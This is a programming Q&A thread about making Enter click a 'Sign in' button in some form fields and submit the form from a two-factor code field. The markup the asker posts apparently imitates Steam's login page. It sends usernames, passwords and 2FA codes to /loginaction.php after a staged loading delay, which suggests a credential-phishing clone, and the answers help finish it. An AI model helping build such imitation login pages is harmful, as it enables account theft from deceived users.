# How to make enter click a button

Tags: javascript, jquery, html, css

I have a button in my form that simply unhides a div, which contains the submit button for the form. I am using the script

I want the user when pressing enter (whilst inside the text input field) to simply click the button and not submit the form. Currently when pressing the enter key I can see the button being clicked for a split second before the form is submitted. How do I make it so a certain input area can click enter and click the button, but another text area pressing enter submits the final form.

I know I can use this script however it stops the enter key from working on the submit form input.

```
window.addEventListener('keypress', function (e) {
if (e.keyCode === 13) {
    e.preventDefault();
    feedTheList();
}
});
```

This is the input that I want the user to be able to press enter on to click the button shown below.

```
<label for="userAccountName">username</label><br>
        <input class="textField" type="text" name="username" 
id="userAccountName" maxlength="64" tabindex="1" value=""><br>&nbsp;<br>
        <label for="userPassword">Password</label><br>
        <input class="textField" type="password" name="password"
id="userPassword" autocomplete="off" maxlength="64" tabindex="2"><br>
```

This is the button input that shows the hidden div (I want the enter key when inside the above input to click this button below.

```
<input class="btn_green_white_innerfade btn_medium" type="button" 
name="submit" id="SteamLogin" value="Sign in" width="104" height="25" 
border="0" tabindex="5" onclick="showDiv()">
```

This is the hidden div input, I want the enter key on this input to submit the form

```
<input name="authcode" class="twofactorauthcode_entry_input 
authcode_placeholder" id="twofactorcode_entry" type="text" 
placeholder="enter your code here" autocomplete="off"/>
```

All of these inputs are inside of the following form

```
<form action="/loginaction.php" method="post" name="submit" id='submit'>
```

and finally the showDiv() function is

```
function showDiv() {
document.getElementById('SteamLogin').style.display = "none";
document.getElementById('loadingGif').style.display = "block";
setTimeout(function() {
document.getElementById('loadingGif').style.display = "none";
var username = document.getElementById("userAccountName").value;
document.getElementById("login_twofactorauth_message_entercode_accountname")
.innerText = username
document.getElementById('showme').style.display = "block";
document.getElementById('unhideme').style.display = "block";
},2000);
```

Comment: the html would help, your explanation isn't very clear. Do you have multiple input boxes, and want the enter function to submit the form only at the last input box? Is that what you're asking for?

Comment: Try putting 'return false;' .

Comment: Yes @almostabeginner, that's exactly what I want, I want the the enter key to submit the form on the last input box, however on the previous input boxes, click the button. I will add html now.

Answer (score 3):

You could add event listeners to the individual inputs - 
The `#twofactorcode_entry` input will submit the form when enter is pressed, while the `.textField` inputs will click the button.

```js
const inputs = document.querySelectorAll('.textField');
const button = document.getElementById('SteamLogin');
const form = document.getElementById('form');
const twofactor = document.getElementById('twofactorcode_entry');
for (var i = 0; i < inputs.length; i++) {
  inputs[i].addEventListener('keypress', e => {
    if (e.key === 'Enter') {
      e.preventDefault();
      button.click();
    }
  });
}
button.addEventListener('click', e => {
  // submit the form instead of showing the hidden input if the input has text
  // if (twofactor.value.length) form.submit();
  showDiv();
});
twofactor.addEventListener('keypress', e => {
  if (e.key === 'Enter') {
    e.preventDefault();
    form.submit();
    alert('submitted form');
  }
});
function showDiv() {
  twofactor.classList.remove('hidden');
}
```

```css
.hidden {
  display:none;
}
```

```html
<form id="form">
  <label for="userAccountName">username</label><br>
  <input class="textField" type="text" name="username" 
  id="userAccountName" maxlength="64" tabindex="1" value=""><br>&nbsp;<br>

  <label for="userPassword">Password</label><br>
  <input class="textField" type="password" name="password" 
  id="userPassword" autocomplete="off" maxlength="64" tabindex="2"><br>
  <!-- removed name="submit" so form.submit() works -->
  <input class="btn_green_white_innerfade btn_medium" type="button" id="SteamLogin"       value="Sign in" width="104" height="25" border="0" tabindex="5"><br>

  <input name="authcode" class="twofactorauthcode_entry_input 
  authcode_placeholder hidden" id="twofactorcode_entry" type="text" 
  placeholder="enter your code here" autocomplete="off"/>
</form>
```

Comment: would you please be able to change the above code to match the html I posted above? It would help a lot

Comment: Thank you very much, and I have a dumb question, where do I put the code that contains the event listeners?

Comment: The event listeners can be added anywhere, provided that the HTML elements already exist at that point. Putting them at the same level as your `showDiv` should be fine.

Comment: So do I need them inside of a script tag? also I noticed you added hidden on to the end of class="twofactorauthcode_entry_input 
  authcode_placeholder ", would you be able to explain the reason for that? my hidden div is working fine, I'm not sure if this changes anything

Comment: is the form being submitted?

Comment: @AshleyBlyth yes, anywhere after the form. I added on to that class because I needed a way to hide it and wasn't sure how you were handling it. You can remove the extra class

Comment: Okay so when inside the username and password input enter clicks the button just as i wanted, however once inside the verification code input the enter key still clicks the button and does not submit the form

Comment: https://jsfiddle.net/kmotawaze/yLcrpp7p/ , basically, create a hidden submit button, and call it when you want to. @AshleyBlyth

Comment: The form is submitted in the call to `form.submit();`, which requires removing `name="submit"` from the button.

Comment: Worked great @almostabeginner, thank you both for your help!